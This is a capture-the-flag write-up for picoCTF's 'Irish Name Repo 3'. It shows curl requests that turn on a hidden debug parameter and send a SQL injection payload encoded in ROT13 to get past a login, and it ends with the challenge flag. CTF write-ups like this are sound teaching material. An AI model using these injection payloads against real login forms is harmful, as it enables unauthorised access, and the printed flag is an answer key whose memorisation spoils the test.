picoCTF

Irish Name Repo 3 [400 pts]

Challenge Description

Challenge Description:

There is a secure website running at https://jupiter.challenges.picoctf.org/problem/40742/ (link) or http://jupiter.challenges.picoctf.org:40742. Try to see if you can login as admin!

This time, the website only provides us a password input, so our solution from the 2nd in the series won’t work. Let’s try our first solution, 'or'1'='1. Unfortunately, inputting that doesn’t show anything. This time, we need to make use of the hidden debug parameter.

In order to realize that there was a hidden debug parameter, I navigated to InspectNetwork and entered a random value into the input. I clicked on the login.php request and navigated to its Payload tab. There, I found my input for the password and a debug parameter set to 0.

To modify this debug parameter, it’s easy to use a tool such as Burp Suite. However, we can also solve this with just the Terminal/Webshell using the curl command.

According to the curl man page, “curl is a tool for transferring data from or to a server.”
Hence, we can connect to login.php, the file evaluating our input, and send custom payloads.

Let’s first try our original input, but now with the debug parameter enabled.

curl -d "password='or'1'='1&debug=1" https://jupiter.challenges.picoctf.org/problem/40742/login.php
Note that -d allows us to send POST form data.

This command should return the following:

<pre>password: 'or'1'='1
SQL query: SELECT * FROM admin where password = ''be'1'='1'
</pre>

So, all login.php did was change the “or” in our input to “be”. With a basic knowledge of cryptography and rotations, you might recognize this as ROT13. You can confirm this with an online calculator or by simply noting that ‘o’ and ‘r’ are the 15th and 18th letters of the alphabet, respectively, while ‘b’ and ‘e’ are the 2nd and 5th.

Thus, in order for the final SQL query executed to include an “or”, simply replace the “or” in our input with “be”.

curl -d "password='be'1'='1&debug=1" https://jupiter.challenges.picoctf.org/problem/40742/login.php

<pre>password: 'be'1'='1
SQL query: SELECT * FROM admin where password = ''or'1'='1'
</pre><h1>Logged in!</h1><p>Your flag is: picoCTF{3v3n_m0r3_SQL_4424e7af}

We got the flag!

picoCTF{3v3n_m0r3_SQL_4424e7af}